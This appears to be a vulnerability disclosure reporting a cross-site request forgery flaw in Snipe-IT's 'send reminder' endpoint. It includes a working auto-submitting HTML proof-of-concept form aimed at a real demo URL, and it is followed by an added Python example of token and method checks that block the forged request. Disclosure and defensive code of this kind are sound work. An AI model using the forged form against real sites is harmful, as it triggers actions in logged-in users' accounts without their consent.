Description
CSRF in Send Reminder
Proof of Concept
1. The attacker sends a fake form to the victim:
<html>
<body>
<form action="https://demo.snipeitapp.com/reports/unaccepted_assets/4/sent_reminder">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2. The victim clicks it, and the send reminder action executes unexpectedly.
Video PoC
https://drive.google.com/file/d/1ei_bfxIbACA6DWObg2bjZjJBiqTPlwWd/view?usp=sharing
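
The PoC form has no `method` attribute, so the browser submits it as a GET, with the victim's session cookie attached. The following is an added example, not Snipe-IT's code and not part of the original report, of the two server-side checks that reject such a request. The handler name, the `_token` field name, the key and the session id are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret used to derive CSRF tokens (constructed here).
SERVER_KEY = secrets.token_bytes(32)

# Methods a browser can trigger cross-site with no user intent; never state-changing.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_id: str) -> str:
    """Token bound to one session; embedded only in forms the application renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_send_reminder(method: str, session_id: str, form: dict) -> tuple:
    """Hypothetical handler for .../sent_reminder; returns (status, message)."""
    # 1. Sending a reminder changes state, so it must not be reachable via GET.
    if method.upper() in SAFE_METHODS:
        return 405, "method not allowed"
    # 2. The request must carry the token issued for this session. A page on
    #    another origin cannot read that token, so it cannot forge the field.
    supplied = str(form.get("_token", ""))
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403, "CSRF token mismatch"
    return 200, "reminder sent"


def demo() -> list:
    """Constructed requests: the PoC's GET, a forged POST, a legitimate POST."""
    sid = "constructed-session-id"
    return [
        handle_send_reminder("GET", sid, {}),    # request produced by the PoC form
        handle_send_reminder("POST", sid, {}),   # cross-site POST, no token
        handle_send_reminder("POST", sid, {"_token": issue_csrf_token(sid)}),
    ]


if __name__ == "__main__":
    for status, message in demo():
        print(status, message)
```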